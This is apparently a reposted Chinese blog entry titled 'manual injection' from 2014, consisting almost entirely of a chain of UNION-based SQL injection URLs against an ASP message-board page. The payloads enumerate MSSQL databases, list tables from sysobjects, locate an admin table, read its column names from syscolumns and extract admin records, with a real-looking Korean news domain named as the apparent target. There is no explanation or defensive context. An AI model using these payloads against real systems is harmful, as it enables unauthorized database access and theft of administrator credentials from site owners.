您的位置:首页 > 其它

手工注入

2014-03-19 17:37 267 查看 
http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,name,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from master.dbo.sysdatabases where dbid=7) http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,name,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from newsdevdb.dbo.sysobjects where xtype='U') http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,name,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from newsdevdb.dbo.sysobjects where xtype='U' and name not in ('TB_BOARD_FILES_002','access','ammrt_','D99_Tmp','dtproperties')) http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,id,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from newsdevdb.dbo.sysobjects where xtype='U' and name = 'TB_ADMIN')
1061578820 http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,name,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from dbo.syscolumns where id = 1061578820)
CREATE_DATE http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,name,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from dbo.syscolumns where id = 1061578820 and name not in ('CREATE_DATE','CREATE_NAME','ID')) http://www.zzzz/community/board_list.asp?code=005&id=13 and 1=2 union all (select top 1 1,2,3,4,CREATE_NAME,6,7,null,null,null,null,null,null,null,null,null,null,null,null,null from newsdevdb.dbo.TB_ADMIN where ID > 0)
gnynews.co.kr
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  1
相关文章推荐
新的分享
章节导航